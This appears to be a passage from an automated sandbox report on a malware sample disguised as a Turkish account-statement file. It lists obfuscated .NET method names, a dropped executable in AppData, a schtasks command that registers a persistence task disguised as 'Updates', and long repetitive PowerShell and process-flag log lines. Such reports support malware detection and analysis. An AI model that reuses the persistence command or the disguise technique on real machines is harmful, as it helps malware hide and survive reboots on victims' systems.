            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, QqJtG6Fm8l5o2Jes3n.csHigh entropy of concatenated method names: 'RdA2cXxPBi', 'oNR274dYNl', 'ToString', 'Sa02O2DZis', 'tuP2poTc81', 'GuF21Ss8Ih', 'Ju92HwW4os', 'fcJ2Klkhhl', 'e272LoWvFF', 'gkw2rgKVWr'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, Mj7IHJPEgFkKQb2HIB.csHigh entropy of concatenated method names: 'uOXAOfRwYO', 'uLDApfRpLd', 'iSOA1r3WbM', 'jWPAH8s5jm', 'zsUAKGOWTw', 'RXUAL4bruP', 'Yf1Arjnegj', 'zOiAIl83Ia', 'yBOAcbHYm3', 'viHA72gUYW'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, dO4cCFGreIfcTfcEoq.csHigh entropy of concatenated method names: 'CT3K090LuZ', 'G9sKpJqPGd', 'vRkKH3HWmF', 'qHdKLRsXYR', 'yAtKreTfru', 'bsAHWhAW0V', 'qDgHQIPw5c', 'ztNHoMQmGH', 'kZGHgZqyVi', 'u3rHZLRqqm'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, FqGxhrDon3ZgwcSj4E.csHigh entropy of concatenated method names: 'nKVPmqgSj3', 'bK2PEDRS5Y', 'yADPf6llpn', 'VUDPOb4Vqv', 'RCGPpjXFXp', 'kmNPHPW3sW', 'Dm4PKQlUaf', 'GZtAoXIIHV', 'sR4Ag0IUEJ', 'Tu9AZ25sG1'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, WEcm2lgpsOIjQaW3Ww.csHigh entropy of concatenated method names: 'fXemLDXEIB', 'eDymru7CjA', 'JDbmcIxKsj', 'Xlim78tXvg', 'ra8mhSW4Gv', 'wcamkSKYes', 'IjC5hroY0wJLd4Dk0U', 'Jm6Ck8WaL4bhiFyDDw', 'qbYmmPHKji', 'l26mEXBaeo'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, IXiuyndR63KB667cvG.csHigh entropy of concatenated method names: 'MbUHUTuvaq', 'RNnH3xLSBW', 'o8w1ugfSly', 'zSn1s3DCUm', 'dOY1RH4M11', 'wNt16rfnrY', 'MYi1eRThbc', 'hKi14564hY', 'noH1VEarSS', 'axs1qmGMvm'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, p7tuS7CtYtgO2dJ1Ly.csHigh entropy of concatenated method names: 'DFT2g7XXW1', 'cGu2iclsp3', 'XYsAngdTwq', 'FpCAmNF5km', 'gse2JxEg2N', 'gik2YLUjMY', 'qOs2jflFqv', 'tim2GWli8M', 'ecX2CBUKc5', 'NXp2S8X62m'
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile created: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
